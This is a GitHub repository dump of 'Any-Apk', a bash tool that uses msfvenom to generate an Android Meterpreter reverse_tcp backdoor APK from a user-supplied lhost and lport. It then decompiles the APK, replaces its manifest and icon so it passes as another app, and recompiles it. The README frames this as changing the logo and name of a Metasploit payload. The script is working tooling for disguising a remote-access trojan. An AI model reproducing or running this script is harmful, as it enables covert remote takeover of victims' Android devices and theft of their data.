├── AndroidManifest.xml ├── Any-Apk.png ├── README.md ├── any-apk.sh ├── icon.png └── key.jsk /AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /Any-Apk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/Any-Apk/3e21041ee5371e6264486f26c88c0188eb44e838/Any-Apk.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Any-Apk 2 | Modifey RAW Metasploit Apk Payload By Changing Logo and Name using this automation script or tool 3 | 4 | ![alt text](https://github.com/kinghacker0/Any-Apk/blob/master/Any-Apk.png) 5 | 6 |

Installation

7 | 8 | $ apt install zipalign apktool apksigner -y 9 | 10 | $ git clone https://github.com/kinghacker0/Any-Apk 11 | 12 |

Usage:-

13 | 14 | $ bash any-apk.sh 15 | 16 |

17 | For more breifly information read article https://hackersking.in 18 |

19 | -------------------------------------------------------------------------------- /any-apk.sh: -------------------------------------------------------------------------------- 1 | #Author - kinghacker0 2 | #Credit - Give me credit if you use any part of my code 3 | clear 4 | #Banner 5 | echo -e "\e[33m \e[0m" 6 | echo -e "\e[33m ::: :::: ::: ::: ::: ::: ::::::::: ::: ::: \e[0m"; 7 | echo -e "\e[33m :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: \e[0m"; 8 | echo -e "\e[33m +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ \e[0m"; 9 | echo -e "\e[33m+#++:++#++: +#+ +:+ +#+ +#++: :++#++: +#++:++#++: +#++:++#+ +#++:++ \e[0m"; 10 | echo -e "\e[33m+#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ \e[0m"; 11 | echo -e "\e[33m#+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# \e[0m"; 12 | echo -e "\e[33m### ### ### #### ### ### ### ### ### ### \e[0m"; 13 | echo -e "\e[33m [Coded By :- @kinghacker0] \e[0m" 14 | echo -e "\e[33m [Github ID :- github.com/kinghacker0 \e[0m" 15 | 16 | echo -e "\e[55m \e[1m" 17 | read -p "[-]Enter Name Of Output Payload#~ :" backdoor 18 | read -p "[-]Enter lhost#~ :" lhost 19 | read -p "[-]Enter lport#~ :" lport 20 | echo -e "\e[55m \e[1m" 21 | msfvenom -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport R> backdoor.apk 22 | #decompile 23 | apktool d backdoor.apk 24 | cd backdoor/res && mkdir drawable 25 | cd .. && rm AndroidManifest.xml 26 | cd .. && cp AndroidManifest.xml backdoor 27 | cp icon.png backdoor/res/drawable 28 | 29 | #Recompiling 30 | apktool b backdoor 31 | cd backdoor && cd dist 32 | mv backdoor.apk .. 33 | cd .. && mv backdoor.apk .. 34 | cd .. && rm -rf backdoor 35 | 36 | #Signing the apk 37 | echo -e "\e[96m \e[2m" 38 | 39 | mv backdoor.apk $backdoor.apk 40 | 41 | echo 42 | echo -e $Y"I Recommend You To Sign It With Apk-Editor Apk" 43 | -------------------------------------------------------------------------------- /icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/Any-Apk/3e21041ee5371e6264486f26c88c0188eb44e838/icon.png -------------------------------------------------------------------------------- /key.jsk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kinghacker0/Any-Apk/3e21041ee5371e6264486f26c88c0188eb44e838/key.jsk --------------------------------------------------------------------------------